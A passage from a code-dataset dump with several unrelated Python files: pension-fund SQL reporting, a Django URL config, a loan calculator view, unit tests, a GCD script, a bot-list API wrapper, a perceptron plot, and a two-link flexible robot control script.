strtgl_baghas)\r\n #config.SendDebugMsg(sSQL)\r\n\r\n\r\n sSQL = \"select r.kode_paket_investasi, sum(mutasi_iuran_pk) + sum(mutasi_iuran_pst) +\\\r\n sum(mutasi_pengembangan) + sum(mutasi_peralihan) as dana\\\r\n from transaksidplk t, rekeningdplk r\\\r\n where \\\r\n t.no_peserta = r.no_peserta\\\r\n and t.iscommitted = 'T'\\\r\n and t.tgl_transaksi < '%s'\\\r\n and r.no_peserta in\\\r\n (\\\r\n \tselect t.no_peserta\\\r\n \tfrom transaksidplk t, nasabahdplk n\\\r\n \twhere \\\r\n \tt.no_peserta = n.no_peserta\\\r\n \tand tgl_registrasi <= '%s'\\\r\n \tand kode_jenis_transaksi = 'J'\\\r\n \tand t.iscommitted = 'T'\\\r\n \tand tgl_transaksi > '%s'\\\r\n )\\\r\n group by r.kode_paket_investasi\\\r\n order by r.kode_paket_investasi\" % (strtgl_investasi, strtgl_investasi, strtgl_investasi)\r\n config.SendDebugMsg(sSQL)\r\n\r\n\r\n \r\n rSQL = config.CreateSQL(sSQL).RawResult\r\n rSQL.First()\r\n while not rSQL.Eof:\r\n dictDanaTutup[rSQL.kode_paket_investasi] = rSQL.dana or 0.0\r\n rSQL.Next()\r\n \t\r\n return dictDanaTutup\r\n \r\ndef GetHasilInv(config, jenisinv, strtgl_investasi, strtgl_baghas):\r\n strSQL = \"\\\r\n select sum(mutasi_kredit) - sum(mutasi_debet) as hasil_investasi \\\r\n from TransaksiInvestasi ti, Investasi i \\\r\n where clsfTransaksiInvestasi = 'C' \\\r\n and tgl_transaksi > '%s' \\\r\n and tgl_transaksi <= '%s' \\\r\n and i.id_investasi = ti.id_investasi \\\r\n and i.kode_jns_investasi = '%s'\"\\\r\n % (strtgl_investasi, strtgl_baghas, jenisinv)\r\n \r\n config.SendDebugMsg(strSQL)\r\n res = config.CreateSQL(strSQL).RawResult\r\n \r\n return res.hasil_investasi or 0.0 \r\n\r\ndef GetNominalInv(config, cls, jenisinv, strSQLEndDate):\r\n strSQL = \"\\\r\n select \\\r\n \tsum(mutasi_debet) - sum(mutasi_kredit) as nominal_investasi \\\r\n from TransaksiInvestasi t, %s d \\\r\n where isCommitted = 'T' \\\r\n \tand clsfTransaksiInvestasi in (%s) \\\r\n \tand t.id_investasi = d.id_investasi \\\r\n \tand tgl_transaksi <= '%s'\"\\\r\n % (jenisinv, cls, strSQLEndDate)\r\n config.SendDebugMsg(strSQL)\r\n res = config.CreateSQL(strSQL).RawResult\r\n \r\n return res.nominal_investasi or 0.0 \r\n\r\n","sub_path":"scripts/investasi/report/reportinv-2011-02-02.py","file_name":"reportinv-2011-02-02.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"99162327","text":"from django.conf.urls import url, include\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Snippets API\",\n default_version='v1',\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\n\n\nurlpatterns = [\n url('api/analytics/', include('analytics.urls')),\n url('api/users/', include('users.urls')),\n url(r'^$', schema_view.with_ui('swagger', cache_timeout=0)),\n]\n","sub_path":"app/perx/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"249346913","text":"from django.shortcuts import render\n\nfrom .forms import CalcForm\n\n\ndef calc_view(request):\n template = \"app/calc.html\"\n if request.method == 'GET':\n form = CalcForm(request.GET)\n if form.is_valid():\n initial_fee = int(request.GET.get('initial_fee'))\n rate = int(request.GET.get('rate'))/100\n months_count = int(request.GET.get('months_count'))\n result = (initial_fee + initial_fee * rate) / months_count\n common_result = (initial_fee + initial_fee * rate)\n\n else:\n form = CalcForm\n\n context = {\n 'form': form,\n 'result': result,\n 'common_result': common_result\n }\n return render(request, template, context)\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"597533052","text":"# Test utils functions\nimport time\nimport pytest\nimport sys\nimport os\n\nPACKAGE_PARENT = '../src'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\n\nfrom database.tables import to_json, from_json, make_checksum\nfrom actor.player import Player\n\n# Setup\n\ndef test_json_conversion():\n\n errors = []\n\n jstest = Player()\n \n converted = to_json(jstest, [])\n restored = from_json(converted)\n if type(restored) != type(jstest):\n errors.append(\"Restored object type != Original object type\")\n\n converted = to_json(jstest, [ '_name' ])\n restored = from_json(converted)\n if hasattr(jstest, '_name') != True:\n errors.append(\"Test object is missing required attribute _name - setup failure\")\n if hasattr(restored, '_name') != False:\n errors.append(\"Test failed: Converted object contains field which should be skipped\")\n\n assert errors == []\n\n\ndef test_make_checksum():\n input = 'Some text to checksum'\n testhash = make_checksum(input)\n\n assert testhash == '8ca468e971e74fc26372ab0507ef6796'\n","sub_path":"test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636288877","text":"from unittest import TestCase\nfrom unittest.mock import patch, Mock\n\nfrom ..cli import (\n argparser,\n BATCLI,\n NestedNameSpace,\n Commands,\n logging,\n argparse,\n)\n\n\nSRC = 'bat.cli'\n\n\nclass TestArgparser(TestCase):\n\n def test_argparser(t):\n argparser()\n\n\nclass TestBATCLI(TestCase):\n\n def setUp(t):\n patches = ['exit', 'get_config', ]\n for target in patches:\n patcher = patch(f'{SRC}.{target}', autospec=True)\n setattr(t, target, patcher.start())\n t.addCleanup(patcher.stop)\n\n def validate_commands(t, commands):\n for cmd in commands:\n with t.subTest(cmd):\n func = '_'.join(cmd.split())\n with patch(f'{SRC}.Commands.{func}', autospec=True) as m_cmd:\n m_cmd.__name__ = func\n ARGS = cmd.split()\n BATCLI(ARGS)\n args = argparser().parse_args(ARGS)\n t.get_config.assert_called_with(\n cli_args=args,\n config_file=args.config_file,\n config_env=args.config_env,\n )\n m_cmd.assert_called_with(\n t.get_config.return_value\n )\n t.exit.assert_called_with(0)\n\n @patch(f'{SRC}.Commands.set_log_level', autospec=True)\n def test_set_log_level(t, set_log_level):\n args = ['--debug', 'hello', ]\n BATCLI(args)\n set_log_level.assert_called_with(argparser().parse_args(args))\n t.exit.assert_called_with(0)\n\n @patch(f'{SRC}.argparser', wraps=argparser)\n def test_missing_command(t, argparser):\n '''prints help if no arguments are given\n '''\n # first get the actual parsed args\n ARGS = []\n parser = argparser()\n parser.print_help = Mock(wraps=parser.print_help)\n args = parser.parse_args(ARGS)\n\n # calling return_value makes argparser return a mock\n m_parser = argparser.return_value\n # make the return value from the mock the real args object\n m_parser.parse_args.return_value = args\n\n BATCLI(ARGS)\n parser.print_help.assert_called_with()\n\n @patch('builtins.print')\n @patch(f'{SRC}.argparser', wraps=argparser)\n def test_command_error(t, argparser, print):\n '''prints the error message, and help if a command throws an error\n '''\n exc = Exception()\n\n def fail(args):\n raise exc\n\n ARGS = []\n parser = argparser()\n args = parser.parse_args(ARGS)\n args.func = fail\n m_parser = argparser.return_value\n m_parser.parse_args.return_value = args\n\n BATCLI(ARGS)\n print.assert_called_with(exc)\n m_parser.print_help.assert_called_with()\n\n def test_commands(t):\n commands = [\n 'hello',\n 'run_functional_tests',\n 'run_container_tests',\n ]\n\n t.validate_commands(commands)\n\n # TODO: full coverage of CLI arguments that trigger commands\n\n\nclass TestNestedNameSpace(TestCase):\n\n def test_nesting(t):\n nns = NestedNameSpace()\n setattr(nns, 'top', 'level')\n setattr(nns, 'bat.baz', 'baz')\n setattr(nns, 'bat.sub.var', 'sub_var')\n\n t.assertEqual(nns.top, 'level')\n t.assertEqual(nns.bat.baz, 'baz')\n t.assertEqual(nns.bat.sub.var, 'sub_var')\n\n\nclass TestCommands(TestCase):\n\n @patch(f'{SRC}.log', autospec=True)\n def test_set_log_level(t, log):\n with t.subTest('default to ERROR'):\n args = argparse.Namespace(loglevel=logging.INFO)\n Commands.set_log_level(args)\n log.setLevel.assert_called_with(logging.INFO)\n\n with t.subTest('set given value'):\n args = argparse.Namespace(loglevel=logging.INFO)\n Commands.set_log_level(args)\n log.setLevel.assert_called_with(logging.INFO)\n","sub_path":"bat/tests/cli_test.py","file_name":"cli_test.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"380517019","text":"import unittest\nimport vcs\nimport warnings\nwarnings.filterwarnings(\"error\")\n\nclass TestVCSInteract(unittest.TestCase):\n def testInteractNoOpen(self):\n\n x=vcs.init()\n x.drawlogooff()\n #x.interact()\n with self.assertRaises(Exception) as context:\n x.interact()\n\n self.assertTrue('Cannot interact if you did not open the canvas yet' in context.exception)\n","sub_path":"tests/test_vcs_interact_no_open.py","file_name":"test_vcs_interact_no_open.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"462336412","text":"# This is for CS 547, helps calculating GCD\n\nprint(\"How many times do you want to use this program?\")\ntimes = input()\ntimes = int(times)\n\nwhile(times != 0):\n print(\"This is the GCD calculator. Please input your values\\nGCD(a,b)\")\n a = input()\n b = input()\n\n number1 = int(a)\n number2 = int(b)\n\n def gcd(a,b):\n if b == 0:\n return a\n else:\n return gcd(b,a%b)\n\n print(\"The GCD values of \" +a+\" & \"+b+\" is \"+str(gcd(number1,number2)))\n\n times-=1","sub_path":"gcdScriptElucid.py","file_name":"gcdScriptElucid.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"64707388","text":"# -*- coding: utf-8 -*-\n# MIT License\n# Copyright (c) 2020 Arthur\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nfrom datetime import datetime\nfrom typing import List, Dict, Union\n\nfrom .user import UserBase\nfrom ..utils import represents, endpoints, AsyncFetcher\n\n\nclass AuctionTag:\n \"\"\"\n Represents a dblstats tag object.\n\n :param bot: A collection of tags strings that are linked to bot types.\n :param server: A collection of tags strings that are linked to server types.\n \"\"\"\n\n def __init__(self, bot: List[str], server: List[str]):\n self.bot = bot\n self.server = server\n\n def __repr__(self):\n return represents(self)\n\n\nclass AuctionUser(UserBase):\n \"\"\"\n Represents a Top.gg auction user.\n\n :param id: The user their discord id\n :param tag: The user their discord tag (username#discriminator)\n :param avatar: The user their discord avatar url\n :param default_avatar: The user their default discord avatar url (calculated by discriminator)\n :param product: The bot/server name for which the bet is for.\n :param tag: That associated page for the product.\n :param list: The list type for the product, this is either bot or server.\n :param amount: The bet amount in usd.\n :param outbid: If this bet has been outbid.\n :param timestamp: When the bet got submitted.\n :param is_fake: If the bet has been verified as real.\n \"\"\"\n\n def __init__(self, id: str, user_tag: str, avatar: str, default_avatar: str, product: str, tag: str, list: str,\n amount: int, outbid: bool, timestamp: datetime, is_fake: bool):\n super().__init__(id, user_tag, avatar, default_avatar)\n self.product = product\n self.tag = tag\n self.list = list\n self.amount = amount\n self.outbid = outbid\n self.timestamp = timestamp\n self.is_fake = is_fake\n\n def __repr__(self):\n return represents(self)\n\n\nclass AuctionCurrent:\n \"\"\"\n Represents all current betters.\n\n :param bot: A dictionary of which contains a collection of :class AuctionUser: objects which are associated with the tag (as key) in the bot section.\n :param server: A dictionary of which contains a collection of :class AuctionUser: objects which are associated with the tag (as key) in the server section.\n \"\"\"\n\n def __init__(self, bot: Dict[str, List[AuctionUser]], server: Dict[str, List[AuctionUser]]):\n self.bot = bot\n self.server = server\n\n def __repr__(self):\n return represents(self)\n\n\nclass Auctions:\n \"\"\"\n An object that can fetch the current Top.gg auctions\n\n :param fetcher: The :class AsyncFetcher: object. (Which will fetch the data from the API)\n\n :property tags: Returns a cached :class AuctionTag:.\n \"\"\"\n\n def __init__(self, fetcher: AsyncFetcher):\n self.__fetcher = fetcher\n\n def __repr__(self):\n return represents(self)\n\n async def get_tags(self) -> AuctionTag:\n \"\"\"\n Fetches the latest tags from the API. This also updates the tags property for this class.\n\n :return AuctionTag: The latest bot and server tags.\n \"\"\"\n tags = await self.__fetcher.get(endpoints.GET_AUCTIONS_TAGS)\n return AuctionTag(tags[\"bot\"], tags[\"server\"])\n\n @staticmethod\n def parse_user_base_obj(data: Dict[str, Union[Dict[str, str], str, bool]]) -> AuctionUser:\n return AuctionUser(data[\"user\"].get(\"id\"), data[\"user\"].get(\"tag\"), data[\"user\"].get(\"avatar\"),\n data[\"user\"].get(\"def_avatar\"), data.get(\"product\"), data.get(\"tag\"),\n data.get(\"list\"), data.get(\"amount\"), data.get(\"outbid\"),\n datetime.strptime(data.get(\"timestamp\"), \"%Y-%m-%dT%H:%M:%S.%fZ\"),\n data.get(\"is_fake\"))\n\n def parse_auction_users(self, database: Dict[str, List[Dict[str, Union[bool, int, Dict[str, str]]]]]) -> \\\n Dict[str, List[AuctionUser]]:\n data = {}\n for key, collection in database:\n data[key] = list(map(self.parse_user_base_obj, collection))\n return data\n\n async def get_current(self) -> AuctionCurrent:\n \"\"\"\n Fetches all current auctions.\n\n :return AuctionCurrent: The latest auctions.\n \"\"\"\n data = await self.__fetcher.get(endpoints.GET_AUCTIONS_CURRENT)\n return AuctionCurrent(self.parse_auction_users(data[\"bot\"].items()),\n self.parse_auction_users(data[\"server\"].items()))\n","sub_path":"dblstats/objects/dblstats_auctions.py","file_name":"dblstats_auctions.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"385338859","text":"#\n\nimport numpy\nimport torch\n\n\nclass Samples:\n @staticmethod\n def sample(categorical, numerical, output, categorical_embeddings, numerical_shape, n_classes, test_partition=0.2, validation_partition=0.2, verbose=False):\n\n # Pytorch Data Preparation\n\n categorical = torch.tensor(categorical, dtype=torch.int64)\n numerical = torch.tensor(numerical, dtype=torch.float)\n output = torch.tensor(output).flatten()\n\n if verbose:\n print(categorical.shape)\n print(numerical.shape)\n print(output.shape)\n\n # Train-Test Split\n\n samples = [int(test_partition * len(output))]\n samples = [len(output) - samples[0]] + samples\n a = numpy.array(numpy.arange(len(output)))\n a_train = numpy.random.choice(a, size=samples[0], replace=False)\n a_test = numpy.setdiff1d(a, a_train)\n\n categorical_data_train, categorical_data_test = categorical[a_train], categorical[a_test]\n numerical_data_train, numerical_data_test = numerical[a_train], numerical[a_test]\n output_data_train, output_data_test = output[a_train], output[a_test]\n\n if verbose:\n print(categorical_data_train.shape, categorical_data_test.shape)\n print(numerical_data_train.shape, numerical_data_test.shape)\n print(output_data_train.shape, output_data_test.shape)\n\n # Train-Validation Split\n\n samples = [int(validation_partition * len(output_data_train))]\n samples = [len(output_data_train) - samples[0]] + samples\n a = numpy.array(numpy.arange(len(output_data_train)))\n a_train = numpy.random.choice(a, size=samples[0], replace=False)\n a_validation = numpy.setdiff1d(a, a_train)\n\n categorical_data_train, categorical_data_validation = categorical_data_train[a_train], categorical_data_train[a_validation]\n numerical_data_train, numerical_data_validation = numerical_data_train[a_train], numerical_data_train[a_validation]\n output_data_train, output_data_validation = output_data_train[a_train], output_data_train[a_validation]\n\n if verbose:\n print(categorical_data_train.shape, categorical_data_validation.shape, categorical_data_test.shape)\n print(numerical_data_train.shape, numerical_data_validation.shape, numerical_data_test.shape)\n print(output_data_train.shape, output_data_validation.shape, output_data_test.shape)\n\n train = DataFormats(categorical_data_train, numerical_data_train, output_data_train)\n validation = DataFormats(categorical_data_validation, numerical_data_validation, output_data_validation)\n test = DataFormats(categorical_data_test, numerical_data_test, output_data_test)\n\n return train, validation, test, categorical_embeddings, numerical_shape, n_classes\n\n\nclass DataFormats:\n def __init__(self, categorical=None, numerical=None, output=None, categorical_embeddings=None, n_classes=None):\n self.categorical = categorical\n self.numerical = numerical\n self.output = output\n self.categorical_embeddings = categorical_embeddings\n self.n_classes = n_classes\n\n @property\n def numerical_shape(self):\n return self.numerical.shape[1]\n\n def gain_all(self):\n return {'categorical': self.categorical, 'numerical': self.numerical, 'output': self.output, 'categorical_embeddings': self.categorical_embeddings, 'numerical_shape': self.numerical_shape, 'n_classes': self.n_classes}\n\n\nclass DataRoles:\n def __init__(self, train=None, validation=None, test=None, categorical_embeddings=None, numerical_shape=None, n_classes=None, non_sampled=None):\n\n if non_sampled is None:\n self.train = train\n self.validation = validation\n self.test = test\n self.categorical_embeddings = categorical_embeddings\n self.numerical_shape = numerical_shape\n self.n_classes = n_classes\n else:\n self.train, self.validation, self.test, self.categorical_embeddings, self.numerical_shape, self.n_classes = Samples.sample(**non_sampled.gain_all())\n\n\nclass Conductor:\n def __init__(self, data_frame, target, embedding_strategy='default', embedding_explicit=None):\n self.data_frame = data_frame\n self._data = None\n if isinstance(target, list):\n self.target = target\n else:\n self.target = [target]\n self._embedding_strategy = embedding_strategy\n self._embedding_explicit = embedding_explicit\n\n @property\n def data(self):\n if self._data is None:\n self.data_cast()\n return self._data\n\n def data_cast(self):\n data = DataFormats()\n data.categorical = numpy.stack([self.data_frame[col].cat.codes.values for col in self.data_frame.columns.values if (self.data_frame[col].dtype.name == 'category') and (col not in self.target)], axis=1)\n data.numerical = numpy.stack([self.data_frame[col].values for col in self.data_frame.columns.values if (self.data_frame[col].dtype.name == 'float64') and (col not in self.target)], axis=1)\n data.output = self.data_frame[self.target].values\n if self._embedding_strategy == 'default':\n data.categorical_embeddings = [(len(self.data_frame[col].cat.categories), min(50, (len(self.data_frame[col].cat.categories) + 1) // 2)) for col in self.data_frame.columns.values if (self.data_frame[col].dtype.name == 'category') and (col not in self.target)]\n elif self._embedding_strategy is None:\n data.categorical_embeddings = None\n else:\n data.categorical_embeddings = self._embedding_explicit\n if self.data_frame[self.target[0]].dtype.name == 'category':\n data.n_classes = self.data_frame[self.target[0]].cat.categories.values.shape[0]\n else:\n data.n_classes = None\n self._data = DataRoles(non_sampled=data)\n\n\n","sub_path":"theth_wyrm/holy/data_keeper/keeper.py","file_name":"keeper.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"269922018","text":"from exkaldirt import stream,base\nfrom exkaldirt import feature\nfrom exkaldirt import decode\nimport os\nimport numpy as np\n\nwavPath = \"../examples/84-121550-0000.wav\"\n\nassert os.path.isfile(wavPath), f\"No such file: {wavPath}\"\n\n###########################\n# Acoustic Estimator\n###########################\n\ndef feat_estimator_test():\n\n reader = stream.StreamReader(\n waveFile = wavPath,\n chunkSize = 480,\n simulate = False,\n vaDetector = None,\n )\n\n cutter = stream.ElementFrameCutter(\n width = 400,\n shift = 160,\n )\n \n extractor = feature.MfccExtractor(\n batchSize = 100,\n useEnergy = False,\n )\n\n processor = feature.FeatureProcessor(\n featDim = 13,\n delta = 2,\n spliceLeft = 10,\n spliceRight = 10,\n cmvNormalizer = feature.FrameSlideCMVNormalizer(),\n )\n \n left = 5\n right = 5\n estimator = decode.AcousticEstimator(\n featDim = 819,\n batchSize = 100,\n applySoftmax = False,\n applyLog = False,\n leftContext = left,\n rightContext = right,\n )\n\n estimator.acoustic_function = lambda x:x[left:-right].copy()\n\n reader.start()\n cutter.start(inPIPE=reader.outPIPE)\n extractor.start(inPIPE=cutter.outPIPE)\n processor.start(inPIPE=extractor.outPIPE)\n estimator.start(inPIPE=processor.outPIPE)\n\n estimator.wait()\n print( estimator.outPIPE.size() )\n\nfeat_estimator_test()\n","sub_path":"exkaldirt/decode_test.py","file_name":"decode_test.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"404149173","text":"import sys\nimport random\nimport json\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt \nmatplotlib.use('TKagg')\n\ninput = np.array([1,1,0.3])\n\n\nax = []\nbx = []\nay = []\nby = [] \n\nwith open('data.json', 'r') as f:\n scatter = json.load(f)\n# print(scatter)\n ax = scatter[\"ax\"]\n ay = scatter[\"ay\"]\n bx = scatter[\"bx\"]\n by = scatter[\"by\"]\n\n\n\n\ndef generate():\n\n ax = []\n ay = []\n bx = []\n by = []\n for i in range(0,50):\n ax.append(random.uniform(-1,1))\n bx.append(random.uniform(-1,1))\n ay.append(random.uniform(-1,1))\n by.append(random.uniform(-1,1))\n\n with open('data.json','w') as f:\n data = {\n \"ax\": ax,\n \"ay\": ay,\n \"bx\": bx,\n \"by\": by\n }\n json.dump(data,f)\n\ndef calculate():\n accuracy = 0\n for i in range(0,50):\n wtx = np.dot(input,np.array([ax[i],ay[i],1]))\n print(ax[i],ay[i],wtx)\n if(wtx>0):\n accuracy+=1\n\n\n for i in range(0,50):\n wtx = np.dot(input,np.array([bx[i],by[i],1]))\n print(bx[i],by[i],wtx)\n if(wtx<0):\n accuracy+=1\n\n print(accuracy)\n\n\ndef plot():\n plt.scatter(ax,ay,marker='o')\n plt.scatter(bx,by,marker='x')\n x = np.linspace(-1, 1, 100)\n plt.plot(x, -x, linestyle='--', color='blue')\n # plt.plot(x, -x, linestyle='--', color='green')\n # plt.plot(x-x, -x, linestyle='--', color='yellow')\n plt.plot(x, x+5, linestyle='--', color='green')\n plt.plot(x,-x-0.3, linestyle='--', color='red')\n plt.show()\n\ndef main():\n # generate()\n # calculate()\n plot()\n\nif __name__ == '__main__' : \n\n main()\n\n \n","sub_path":"HW_2/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"640884266","text":"from app.adapter import PokemonsRequest\nfrom app.settings import URL_POKE_API\nimport json\n\nclass PokemonRest():\n def __init__(self):\n self.data = PokemonsRequest()\n\n def get_all_pokemons(self):\n response = self.data.request_data(url=URL_POKE_API)\n pokelist = self.__next_pokemons(response)\n return pokelist\n\n def get_pokemon_by_id(self, identification_number):\n pokemon = self.data.request_data_by_id(identification_number=identification_number)\n return pokemon\n\n def get_pokemon_by_name(self, name, offset=20, limit=0, sort='asc'):\n response = self.data.request_data(url=URL_POKE_API)\n pokelist = self.__next_pokemons(response)\n match = self.__attach_pokemon_by_name(pokelist, sort, name=name)\n return match\n\n def __next_pokemons(self, response):\n pokelist = []\n for x in response[\"results\"]:\n pokelist.append(x)\n all_pokemons = response.get(\"count\")\n while len(pokelist) != all_pokemons:\n url = response.get(\"next\")\n if url is not None:\n response = self.data.request_data(url=url)\n else:\n response = self.data.request_data(url=URL_POKE_API, offset=len(pokelist))\n for x in response[\"results\"]:\n pokelist.append(x)\n\n return pokelist\n\n def __attach_pokemon_by_name(self, pokelist, sort, name):\n attach = []\n sort = False\n for i in range(len(pokelist)):\n pokemon_name = pokelist[i].get('name')\n if name in pokemon_name:\n attach.append(pokelist[i])\n print(attach)\n if sort == \"desc\":\n sort = True\n result = sorted(attach, key=lambda x: x['name'], reverse=sort)\n return result\n","sub_path":"app/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"460126853","text":"\"\"\"\n#------------------------------------------------------------------------------\n# Create ZV-IC Shaper\n#\n# This script will take a generalized input from an undamped second order system subject \n# to nonzero initial conditions and solve the minimum-time ZV shaper using optimization\n#\n# Created: 6/20/17 - Daniel Newman -- dmn3669@louisiana.edu\n#\n# Modified:\n# * 6/20/17 - DMN -- dmn3669@louisiana.edu\n#\t\t\t- Added documentation for this script\n#------------------------------------------------------------------------------\n\"\"\"\n\n# Ignore user warnings to keep the terminal clean\nimport warnings\nwarnings.simplefilter(\"ignore\", UserWarning)\nwarnings.simplefilter(\"ignore\", RuntimeWarning)\n\n# Import the necessary python library modules\nimport numpy as np\nfrom scipy.signal import lsim\nfrom scipy.special import gamma\nfrom scipy import integrate\nimport control\nfrom scipy import optimize\nimport os\nimport sys\nimport pdb\n\n# Add my local path to the relevant modules list\nsys.path.append('/Users/Daniel/Github/Crawlab-Student-Code/Daniel Newman/Python Modules')\n\n# Import my python modules\nimport InputShaping as shaping\nimport Generate_Plots as genplt\nimport kanes_2link as twolink\n\nfolder = 'Figures/{}/'.format(\n\t\t\t\t\t\t\t\t\t\t\t\tsys.argv[0],\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\n# Number of elements per link\nn = 3\n\n# Time array\ntmax = 15\nt_step = 0.01\nt = np.arange(0,tmax,t_step)\nStartTime = 0.0\n\n# Conversion for degrees to radians\nDEG_TO_RAD = np.pi / 180\n\n# Link Length\nL_1 = 0.5\nL_2 = 0.5\nL = [L_1,L_2]\n\n# Mass density per unity length\nrho = 0.2\n\n# Mass of the links\nm_1 = rho * L_1\nm_2 = rho * L_2\nM = [m_1,m_2]\n\n# Mass of the link payloads\nm_p = np.arange(0.0,1.0,0.1)\nm_h2 = 1\n\nJ_h1 = 0.1\nJ_h2 = 0.1\nJ_p = 0.0005\nJ = [J_h1,J_h2,J_p]\n\n# Initial states\ntheta1_0 = 0\ntheta1_dot_0 = 0\ntheta2_0 = 0\ntheta2_dot_0 = 0\nX0 = [np.rad2deg(theta1_0),np.rad2deg(theta2_0),theta1_dot_0,theta2_dot_0]\n\n# Stiffness of the links\nE = 1\nI = 1\n\n# Maximum allowed actuator effort\ntau_max = 10\n\ntheta1_d = 90. * DEG_TO_RAD\ntheta2_d = 90. * DEG_TO_RAD\nDistance = [theta1_d,theta2_d]\nDisturb_Dist = [0.001,0.001]\n\n# Arguments to pass to the solver\np = [tau_max, M, J, I, E, L, StartTime, t_step, t, X0, Distance]\np_disturb = [tau_max, M, J, I, E, L, StartTime, t_step, t, X0, Disturb_Dist]\n\nKane_nom = twolink.derive_sys(n,[[0.1,m_h2],J, E, I])\n\nQ = np.diagflat([0.9486, 0.2993, 0.0744, 0.0010, 0.2299, 1.8036, 0.0240, 4.4930, 0.0010, 0.0034, 0.0010, 2.7230]) \nR = np.diagflat([0.5574, 0.0742])\n\nA,B = twolink.linearize_system(n,Kane_nom,p)\n\nQ_LQR = np.diagflat([0.0010, 0.0010, 0.0010, 1.3499, 0.0644, 2.7491, 0.0184, 4.5188, 0.5126, 0.0722, 0.1133, 1.0610 ]) \nR_LQR = np.diagflat([1.0818, 0.1238])\n\nLQR_Gains,S,Eigs = control.lqr(A,B,Q_LQR,R_LQR)\nLQR_Gains = LQR_Gains.T\nK_damped,S,Eigs = control.lqr(A,B,Q,R)\n\nK_damped = K_damped.T\nK_damped[1,:] = 0\nK_damped[2*n-2,:] = 0\nK_damped[3*n-2,:] = 0\nK_damped[4*n-2,:] = 0.\n\n\nLQR_Gains[1,:] = 0\nLQR_Gains[2*n-2,:] = 0\nLQR_Gains[3*n-2,:] = 0\nLQR_Gains[4*n-2,:] = 0.\n\nOmegas_damp,Zetas_damp = twolink.nominal_omega(n,Kane_nom,p,K_damped)\nLQR_Omegas,LQR_Zetas = twolink.nominal_omega(n,Kane_nom,p,LQR_Gains)\n\ndes_xy = np.zeros([1,4*n])\n\ndes_xy[:,0:n] = np.tile(theta1_d,(n,1)).T\ndes_xy[:,n:2*n] = np.tile(theta2_d,(n,1)).T\n\ndes_x,des_y = twolink.get_xy_coords(n,des_xy,L)\n\ndef settling_time(response):\n X,Y = twolink.get_xy_coords(n,response,L)\n less = np.where(\n np.sqrt((X[:,-1] - des_x[0,-1]) / des_x[0,-1] \\\n + (Y[:,-1] - des_y[0,-1])**2) > 0.05 )\n\n t_settle = t[np.amax(less)]\n return t_settle\n\nlqr_settle = np.zeros(len(m_p))\nshaped_settle = np.zeros(len(m_p))\n'''\nfor i in range(len(m_p)):\n\n payload_mass = float(m_p[i])\n\n # Derive the system using Kane's method\n Kane = twolink.derive_sys(n,[[payload_mass,m_h2],J, E, I])\n\n LQR_response,[unshaper,unshaper],LQR_Gains = twolink.response(\n n,Kane,p,LQR_Gains,LQR_Omegas,LQR_Zetas,\n Shaper1='Unshaped',Shaper2='Unshaped',\n motion='Step'\n )\n\n shaped_response,[Shaper,Shaper],Shaped_Gains = twolink.response(\n n,Kane,p,K_damped,Omegas_damp,Zetas_damp,\n Shaper1='ZV ZV ZV',Shaper2='ZV ZV ZV',\n motion='Step'\n )\n\n lqr_settle[i] = settling_time(LQR_response)\n shaped_settle[i] = settling_time(shaped_response)\n\ngenplt.compare_responses(m_p / 0.1,\n 